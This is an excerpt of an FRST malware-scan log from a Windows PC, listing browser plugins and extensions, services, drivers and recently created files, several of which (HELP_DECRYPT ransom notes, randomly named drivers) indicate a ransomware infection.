FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll [2014-05-22] (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2015-08-04] (DivX, LLC)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @real.com/nppl3260;version=6.0.11.2852 -> C:\Program Files (x86)\Magic DVD Creator\Real\browser\plugins\nppl3260.dll [No File]
FF Plugin-x32: @real.com/nppl3260;version=6.0.12.46 -> C:\Program Files (x86)\Magic DVD Creator\Real\browser\plugins\nppl3260.dll [No File]
FF Plugin-x32: @real.com/nprpjplug;version=6.0.12.1662 -> C:\Program Files (x86)\Magic DVD Creator\Real\browser\plugins\nprpjplug.dll [No File]
FF Plugin-x32: @real.com/nprpjplug;version=6.0.12.46 -> C:\Program Files (x86)\Magic DVD Creator\Real\browser\plugins\nprpjplug.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-06-26] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-29]
CHR Extension: (ListView General Property Page Object) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2015-10-13]
CHR Extension: (Google Docs) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-29]
CHR Extension: (Google Drive) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-29]
CHR Extension: (YouTube) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-04-02]
CHR Extension: (Google Search) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-04-02]
CHR Extension: (Google Sheets) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-29]
CHR Extension: (Add to Feedly ) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghaljlgnomaiedigplceadckbkkdkfem [2015-06-28]
CHR Extension: (Google Docs Offline) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-10]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-09-10]
CHR Extension: (Google Wallet) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-03-29]
CHR Extension: (Gmail) - C:\Users\christopher lane\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-04-02]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
S2 Bluetooth Device Monitor; C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe [901184 2011-01-24] (Intel Corporation) [File not signed]
S3 Bluetooth Media Service; C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe [1298496 2011-01-24] (Intel Corporation) [File not signed]
S2 Bluetooth OBEX Service; C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe [991296 2011-01-24] (Intel Corporation) [File not signed]
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-27] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [136048 2015-08-27] (Dropbox, Inc.)
R2 MSMQ; C:\Windows\system32\mqsvc.exe [26112 2015-10-11] (Microsoft Corporation)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [247968 2015-10-11] (Synaptics Incorporated)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [84480 2015-10-11] (Microsoft Corporation)
R2 W3SVC; C:\Windows\system32\inetsrv\iisw3adm.dll [578560 2015-10-11] (Microsoft Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-09] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-09] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1390904 2015-10-11] (Motorola Solutions, Inc.)
S1 lrvcraza; C:\Windows\system32\drivers\lrvcraza.sys [55168 2015-10-08] (Microsoft Corporation)
S3 MarvinBus; C:\Windows\System32\DRIVERS\MarvinBus64.sys [261120 2005-09-23] (Pinnacle Systems GmbH) [File not signed]
R3 MQAC; C:\Windows\System32\drivers\mqac.sys [175104 2015-10-11] (Microsoft Corporation)
R3 NETwNs64; C:\Windows\system32\DRIVERS\Netwsw01.sys [11532704 2015-03-13] (Intel Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [44192 2015-10-11] (Synaptics Incorporated)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-09] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-09] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-09] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30544 2015-10-11] (HP)
U3 idsvc; no ImagePath
S1 kzgqwavs; \??\C:\WINDOWS\system32\drivers\kzgqwavs.sys [X]
S1 ubuqhhia; \??\C:\WINDOWS\system32\drivers\ubuqhhia.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-10-16 20:54 - 2015-10-16 20:54 - 00033083 _____ C:\Users\christopher lane\Desktop\FRST.txt
2015-10-16 20:54 - 2015-10-16 20:54 - 00000000 ____D C:\FRST
2015-10-16 20:53 - 2015-10-16 20:54 - 02196480 _____ (Farbar) C:\Users\christopher lane\Desktop\FRST64.exe
2015-10-16 20:45 - 2015-10-16 20:45 - 00016148 _____ C:\WINDOWS\system32\CHRISTOPHERLANE_christopher lane_HistoryPrediction.bin
2015-10-15 00:30 - 2015-10-16 20:43 - 00000000 ___HD C:\b43abdf8
2015-10-14 23:11 - 2015-10-15 03:21 - 00000000 ____D C:\Users\christopher lane\Desktop\CAPs
2015-10-14 21:24 - 2015-10-14 21:24 - 00004254 _____ C:\Users\christopher lane\HELP_DECRYPT.TXT
2015-10-14 21:24 - 2015-10-14 21:24 - 00004254 _____ C:\Users\christopher lane\Desktop\HELP_DECRYPT.TXT
2015-10-14 21:24 - 2015-10-14 21:24 - 00000292 _____ C:\Users\christopher lane\HELP_DECRYPT.URL
2015-10-14 21:24 - 2015-10-14 21:24 - 00000292 _____ C:\Users\christopher lane\Desktop\HELP_DECRYPT.URL
2015-10-14 20:56 - 2015-10-14 20:56 - 00004254 _____ C:\Users\christopher lane\Downloads\HELP_DECRYPT.TXT
2015-10-14 20:56 - 2015-10-14 20:56 - 00000292 _____ C:\Users\christopher lane\Downloads\HELP_DECRYPT.URL
2015-10-14 20:48 - 2015-10-14 20:48 - 00004254 _____ C:\Users\christopher lane\Documents\HELP_DECRYPT.TXT
2015-10-14 20:48 - 2015-10-14 20:48 - 00000292 _____ C:\Users\christopher lane\Documents\HELP_DECRYPT.URL
2015-10-14 19:54 - 2015-10-14 19:54 - 00004254 _____ C:\Users\christopher lane\AppData\Roaming\HELP_DECRYPT.TXT
2015-10-14 19:54 - 2015-10-14 19:54 - 00004254 _____ C:\Users\christopher lane\AppData\LocalLow\HELP_DECRYPT.TXT
2015-10-14 19:54 - 2015-10-14 19:54 - 00004254 _____ C:\Users\christopher lane\AppData\Local\HELP_DECRYPT.TXT
2015-10-14 19:54 - 2015-10-14 19:54 - 00004254 _____ C:\Users\christopher lane\AppData\HELP_DECRYPT.TXT
2015-10-14 19:54 - 2015-10-14 19:54 - 00000292 _____ C:\Users\christopher lane\AppData\Roaming\HELP_DECRYPT.URL
2015-10-14 19:54 - 2015-10-14 19:54 - 00000292 _____ C:\Users\christopher lane\AppData\LocalLow\HELP_DECRYPT.URL
2015-10-14 19:54 - 2015-10-14 19:54 - 00000292 _____ C:\Users\christopher lane\AppData\Local\HELP_DECRYPT.URL
2015-10-14 19:54 - 2015-10-14 19:54 - 00000292 _____ C:\Users\christopher lane\AppData\HELP_DECRYPT.URL
2015-10-14 19:53 - 2015-10-14 19:53 - 00004254 _____ C:\ProgramData\HELP_DECRYPT.TXT
2015-10-14 19:53 - 2015-10-14 19:53 - 00000292 _____ C:\ProgramData\HELP_DECRYPT.URL
2015-10-14 19:36 - 2015-10-14 19:36 - 00100128 _____ C:\Users\christopher lane\Desktop\Grievance-Letter Log.xlsx
2015-10-14 19:34 - 2015-10-14 19:35 - 00100128 _____ C:\Users\christopher lane\Downloads\Grievance-Letter Log.xlsx
2015-10-13 14:12 - 2015-10-10 00:12 - 00078528 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-10-13 14:12 - 2015-10-09 23:40 - 21875712 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2015-10-13 14:12 - 2015-10-09 23:07 - 18806272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2015-10-13 14:12 - 2015-10-05 20:03 - 16708608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2015-10-13 14:12 - 2015-10-05 19:46 - 13027840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2015-10-13 14:12 - 2015-09-30 21:01 - 01294352 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2015-10-13 14:12 - 2015-09-30 21:01 - 01123400 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2015-10-13 14:12 - 2015-09-30 21:01 - 01018568 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2015-10-13 14:12 - 2015-09-30 21:01 - 00858408 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2015-10-13 14:12 - 2015-09-30 21:00 - 08020320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-10-13 14:12 - 2015-09-30 20:03 - 00757760 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2015-10-13 14:12 - 2015-09-24 21:01 - 02573768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2015-10-13 14:12 - 2015-09-24 21:01 - 00498016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbhub.sys
2015-10-13 14:12 - 2015-09-24 20:56 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-10-13 14:12 - 2015-09-24 20:52 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2015-10-13 14:12 - 2015-09-24 20:33 - 01997336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2015-10-13 14:12 - 2015-09-24 20:26 - 20858360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-10-13 14:12 - 2015-09-24 20:17 - 24595456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-10-13 14:12 - 2015-09-24 20:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2015-10-13 14:12 - 2015-09-24 20:11 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2015-10-13 14:12 - 2015-09-24 20:09 - 12504064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-10-13 14:12 - 2015-09-24 20:07 - 01276416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2015-10-13 14:12 - 2015-09-24 20:04 - 02178560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2015-10-13 14:12 - 2015-09-24 20:04 - 00826880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-10-13 14:12 - 2015-09-24 20:04 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2015-10-13 14:12 - 2015-09-24 20:03 - 00796160 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2015-10-13 14:12 - 2015-09-24 20:03 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-10-13 14:12 - 2015-09-24 20:02 - 07523840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2015-10-13 14:12 - 2015-09-24 20:02 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-10-13 14:12 - 2015-09-24 20:02 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2015-10-13 14:12 - 2015-09-24 20:02 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2015-10-13 14:12 - 2015-09-24 20:01 - 04792320 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-10-13 14:12 - 2015-09-24 20:01 - 03586560 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2015-10-13 14:12 - 2015-09-24 20:00 - 01423872 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2015-10-13 14:12 - 2015-09-24 20:00 - 01382400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2015-10-13 14:12 - 2015-09-24 20:00 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2015-10-13 14:12 - 2015-09-24 20:00 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 01795072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 01205248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2015-10-13 14:12 - 2015-09-24 19:59 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2015-10-13 14:12 - 2015-09-24 19:58 - 01871360 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2015-10-13 14:12 - 2015-09-24 19:48 - 19325952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-10-13 14:12 - 2015-09-24 19:47 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2015-10-13 14:12 - 2015-09-24 19:47 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2015-10-13 14:12 - 2015-09-24 19:38 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-10-13 14:12 - 2015-09-24 19:38 - 00650240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-10-13 14:12 - 2015-09-24 19:38 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2015-10-13 14:12 - 2015-09-24 19:38 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-10-13 14:12 - 2015-09-24 19:37 - 00766976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-10-13 14:12 - 2015-09-24 19:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2015-10-13 14:12 - 2015-09-24 19:37 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2015-10-13 14:12 - 2015-09-24 19:36 - 11262976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-10-13 14:12 - 2015-09-24 19:36 - 05454848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2015-10-13 14:12 - 2015-09-24 19:34 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2015-10-13 14:12 - 2015-09-24 19:34 - 00625152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2015-10-13 14:12 - 2015-09-24 19:34 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2015-10-13 14:12 - 2015-09-24 19:34 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2015-10-13 14:12 - 2015-09-24 19:34 - 00525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2015-10-13 14:12 - 2015-09-24 19:33 - 00131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2015-10-13 14:12 - 2015-09-24 19:32 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2015-10-13 14:12 - 2015-09-24 19:32 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2015-10-13 13:55 - 2015-10-02 10:36 - 00810488 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-10-13 13:55 - 2015-10-02 10:36 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-10-12 22:36 - 2015-10-16 20:52 - 00000000 ____D C:\Users\christopher lane\AppData\Roaming\Cateia Games
2015-10-12 21:56 - 2015-10-12 21:56 - 00001606 _____ C:\Users\christopher lane\Desktop\iexplore - Shortcut.lnk
2015-10-11 15:41 - 2015-09-16 23:49 - 06487248 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2015-10-11 15:41 - 2015-09-16 23:28 - 05120056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2015-10-11 15:41 - 2015-09-16 22:53 - 07055872 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2015-10-11 15:40 - 2015-09-16 23:50 - 02464216 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2015-10-11 15:40 - 2015-09-16 23:48 - 02824248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2015-10-11 15:40 - 2015-09-16 23:48 - 02494712 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-11 15:40 - 2015-09-16 23:48 - 01983824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2015-10-11 15:40 - 2015-09-16 23:28 - 02154808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2015-10-11 15:40 - 2015-09-16 23:27 - 01766952 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2015-10-11 15:40 - 2015-09-16 23:04 - 07569408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2015-10-11 15:40 - 2015-09-16 23:00 - 03248640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2015-10-11 15:40 - 2015-09-16 23:00 - 02417664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2015-10-11 15:40 - 2015-09-16 22:54 - 03781120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2015-10-11 15:40 - 2015-09-16 22:51 - 02660864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2015-10-11 15:40 - 2015-09-16 22:49 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-10-11 15:40 - 2015-09-16 22:42 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2015-10-11 15:40 - 2015-09-16 22:40 - 06101504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2015-10-11 15:40 - 2015-09-16 22:40 - 01918464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2015-10-11 15:40 - 2015-09-16 22:35 - 05079552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2015-10-11 15:40 - 2015-09-16 22:35 - 02207232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-10-11 15:40 - 2015-09-16 22:35 - 01820160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2015-10-11 15:39 - 2015-09-16 23:50 - 01563392 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2015-10-11 15:39 - 2015-09-16 23:48 - 02432336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2015-10-11 15:39 - 2015-09-16 23:48 - 02156400 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2015-10-11 15:39 - 2015-09-16 23:48 - 00809352 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2015-10-11 15:39 - 2015-09-16 23:48 - 00784136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2015-10-11 15:39 - 2015-09-16 23:47 - 01397088 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2015-10-11 15:39 - 2015-09-16 23:44 - 00781976 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2015-10-11 15:39 - 2015-09-16 23:43 - 00966416 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2015-10-11 15:39 - 2015-09-16 23:37 - 01295712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2015-10-11 15:39 - 2015-09-16 23:26 - 02446648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2015-10-11 15:39 - 2015-09-16 23:26 - 00646672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2015-10-11 15:39 - 2015-09-16 23:25 - 00962400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2015-10-11 15:39 - 2015-09-16 23:20 - 00764416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2015-10-11 15:39 - 2015-09-16 23:06 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2015-10-11 15:39 - 2015-09-16 23:05 - 02226688 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2015-10-11 15:39 - 2015-09-16 22:57 - 02228736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2015-10-11 15:39 - 2015-09-16 22:56 - 00859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2015-10-11 15:39 - 2015-09-16 22:55 - 02236416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-10-11 15:39 - 2015-09-16 22:55 - 01601536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2015-10-11 15:39 - 2015-09-16 22:52 - 01181696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2015-10-11 15:39 - 2015-09-16 22:51 - 01203712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2015-10-11 15:39 - 2015-09-16 22:49 - 01290240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2015-10-11 15:39 - 2015-09-16 22:49 - 01010176 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2015-10-11 15:39 - 2015-09-16 22:48 - 02093056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2015-10-11 15:39 - 2015-09-16 22:45 - 01331200 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-10-11 15:39 - 2015-09-16 22:43 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2015-10-11 15:39 - 2015-09-16 22:40 - 01162240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2015-10-11 15:39 - 2015-09-16 22:38 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2015-10-11 15:39 - 2015-09-16 22:35 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2015-10-11 15:39 - 2015-09-16 22:29 - 01104384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-10-11 15:39 - 2015-09-16 22:26 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2015-10-11 15:39 - 2015-09-12 19:05 - 02987520 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2015-10-11 15:38 - 2015-09-16 23:49 - 01563472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2015-10-11 15:38 - 2015-09-16 23:49 - 00894256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Wdf01000.sys
2015-10-11 15:38 - 2015-09-16 23:49 - 00553808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2015-10-11 15:38 - 2015-09-16 23:48 - 00555768 _____ (Microsoft Corporation) C:\WINDOWS\system32\directmanipulation.dll
2015-10-11 15:38 - 2015-09-16 23:48 - 00537080 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2015-10-11 15:38 - 2015-09-16 23:48 - 00505696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2015-10-11 15:38 - 2015-09-16 23:48 - 00476760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2015-10-11 15:38 - 2015-09-16 23:28 - 01357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2015-10-11 15:38 - 2015-09-16 23:28 - 00441168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
